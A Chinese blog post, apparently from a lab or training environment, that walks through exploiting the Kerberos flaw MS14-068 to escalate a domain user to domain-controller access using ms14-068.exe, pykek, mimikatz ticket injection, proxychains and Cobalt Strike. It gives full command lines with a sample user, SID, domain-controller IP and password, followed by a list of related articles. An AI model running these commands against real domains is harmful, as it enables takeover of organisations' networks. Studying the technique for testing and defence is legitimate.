ms14-068提权域控

最新推荐文章于 2023-11-20 16:46:09 发布
最新推荐文章于 2023-11-20 16:46:09 发布
阅读量700 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51524329/article/details/120308725
版权

msf ms14-068 提权域控

上传ms14-068.exe到目标主机的目录上

upload /root/wwwhack23/ms14-068.exe C:/phpstudy_pro/www/www/www.webhack123.com/ms14-068.exe

在这里插入图片描述
这些信息从metasploit 前期信息来的,可以翻到上面查看

ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

这里控制的主机必须要能够和10.10.10.149通信,
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器ip地址 -p 域成员密码
在这里插入图片描述
在这里插入图片描述

上传mimikatz到目标主机
在这里插入图片描述
运行查看票据
在这里插入图片描述
先清除所有票据
在这里插入图片描述
查看票据,刚刚使用命令已经将全部的票据清除,此时使用mimkatz注入票据kerberos::ptc TGT_web@hackbox.com.ccache
在这里插入图片描述
查看票据,可以知道刚刚注入的票据成功了
在这里插入图片描述
此时能够成功访问域控在这里插入图片描述

cobaltstrike ms14-068 提权到域控

root@kali:~/Desktop/webhack123/pykek# set +H

root@kali:~/Desktop/webhack123/pykek# proxychains python ms14-068.py -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

这里为什么要添加proxychains,因为我们在创建票据的时候无法访问10.10.10.149,所以要使用代理
在这里插入图片描述
KrbCredExport 将 .ccache 文件转化为 kirbi 格式 python KrbCredExport.py …/pykek/TGT_web@hackbox.com.ccache user.ticket
在这里插入图片描述
导入票据 kerberos_ticket_use C:\user.ticket

在这里插入图片描述

红云谈安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AD域渗透 | MS14068漏洞原理及复现
m0_57221101的博客
04-18 2557
漏洞编号MS14-068的漏洞,将允许任意用户提升到域管理员的权限,补丁编号则是KB3011780 原理分析 ​ 在之前提到白银票据攻击的时候,我们仿佛默认了一个用户可以访问任何的服务。但事实上,往往我们需要控制一些账户使他们不能访问一些服务。这时微软引入了PAC的概念,PAC包含了用户的ID,组ID一类的认证信息。进一步的PAC的分析,请期待我之后会发布的Kerberos协议的抓包分析。如果现在就想要进一步了解请看文末的链接,将导向daiker大佬的文章 ​ 在这里PAC权限验证机制产生漏洞的原因是
MS14-068漏洞复现
qq_56426046的博客
11-11 2971
(身份认证票据) 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。这里利用 MS14-068提权,先检查下是否有 MS14-068, CVE 编号CVE-2014-6324, 补丁为 3011780 : systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在漏洞,需要注意的是域内普通用户提权成功后是有时效性的。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2499
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
通过 Cobalt Strike 利用 ms14-068
weixin_30737363的博客
11-19 801
拓扑图 攻击者(kali) 位于 192.168.245.0/24 网段,域环境位于 192.168.31.0/24 网段。 域中有一台 win7 有两张网卡,可以同时访问两个网段,以这台机器作为跳板机进入域环境。 假设现在已经有一组域用户的账号密码 user1 321!@#qwe 获取用户的 sid whoami /user 下面使用 pykek 生成票据,首先用 cs 开一个 socks...
复现MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 517
MS14-068
ms14-068之metasploit应用
zz_strive_2012的专栏
06-17 3086
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum msf auxiliary(ms14_068_kerberos_checksum) > show options5 U- @! U" R, X9 F: i Module options (auxiliary/admin/kerberos/ms14_068_
ms14-068.exe域内神器
11-25
ms14-068.exe域内神器
pykek-ms14-068.zip
最新发布
01-06
pykek-ms14-068.zip
ms14-068利用工具包.zip
07-01
包含了minikatazx64位,以及MS14-068.exems14-068.exe。工具可以放心使用。无后门,如果需要免杀可以自行混淆加壳
MS14-058提权神器
09-24
MS14-058 提权 windows提权
MS14-068AD域提权神器
05-24
1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号...
(转)MS14-068域内提权漏洞总结
weixin_30849591的博客
05-07 923
0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票。银票是一张tgs,也就是一张服务票据。服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。所以ms14-068的来源和银票是息息相关的。 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许...
MS14-068漏洞提权学习(实战)&& 域控服务器搭建 && 远程权限提升 && 查看域控中的sid
永不垂头的博客
08-29 426
MS14-068漏洞提权学习(实战)&& 域控服务器搭建 && 远程权限提升 && 查看域控中的sid 文章目录MS14-068漏洞提权学习(实战)&& 域控服务器搭建 && 远程权限提升 && 查看域控中的sid前言一、MS14-068漏洞提权学习二、MS14-068漏洞提权实战三、域控服务器搭建四、远程权限提升五、查看域控中的sid六、我的公众号 前言 一、MS14-068漏洞提权学习 安装dcpro
de1ay靶场实战
weixin_43873557的博客
02-20 1525
文章目录de1ay环境WEB信息收集weblogic 10.3.6WeblogicScanWeblogic-EXP反弹shellProxy代理reGeorg + proxychainsmsf socks代理cs socks代理dump hashmimikatzpowershellprocdumpcs的logonpasswordsLaZagne横向移动-PTHCS-PTH横向移动-PTTms14-068 de1ay 环境 所有机器密码:1qaz@WSX DE1AY\administrator 1qaz@
MS14-068漏洞进行提权
mingyqf的博客
02-24 1701
参考:https://blog.csdn.net/qq_37683287/article/details/120450044 server2008有效 MS14068是一个能够使普通用户提权域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。 第一步:利用MS14-068伪造生成TGT 第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书 kerberos::ptc TGT_test@moonsec.fbi.ccache 第三步:获取域管理员权限。创建
史上最强内网基础总结
xingxuxingxu的博客
08-29 308
内网
kerberos-MS14-068(kerberos域用户提权)
Ms08067安全实验室
11-20 224
点击星标,即时接收最新推文微软官方在2014年11月18日发布了一个紧急补丁,Windows全版本服务器系统受到影响,包括Windows Server 2003,Windows Server 2008,Windows Server 2008 R2,Windows Server 2012和Windows Server 2012 R2,修复了Microsoft Windows Kerberos KDC...
MS14-068域权限提升漏洞利用
cj_Hydra's Blog
02-15 1725
前言: 在写该篇文章之前,本人已经写过了关于域渗透之黄金票据和白银票据的利用方式,今天的内容也是关于域渗透提权的利用,并且MS14-068这个exp也是由kerberos协议而来。 在实际的渗透过程中,获得了一个域成员(非管理员)的账号后,如果刚好域控机器未打补丁(KB3011780)这是官方给出的修复补丁,那么就可以利用MS14-068该exp来快速获得域控权限。 利用方式: 1:域用户和密码 ...
内网渗透-项目六外围打点
qq_50643984的博客
03-18 2171
1.外围打点 1.1拓补图 1.2发现主机 arp-scan -l 可以发现目标ip为192.168.31.138,nmap扫描端口,接下来绑定hosts域名,访问目标网站。 nmap -p- -sC -sV -O 192.168.31.138 -oA ip_port 注:-p为指定端口,可以先用masscan扫描开发端口,再用nmap。 绑定hosts,目标域名是www.webhack123.com vim /etc/hosts 直接按照图中添加就可以了。 1.3网站目录扫描 打开网站发现没有什
ms14-068下载
12-04
ms14-068是微软公司发布的一个安全更新程序,用于修复Windows操作系统中一个重要的安全漏洞。这个漏洞存在于Windows域控制器中,攻击者可以利用它在网络中执行特权提升攻击,从而获取对系统的完全控制。因此,微软...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值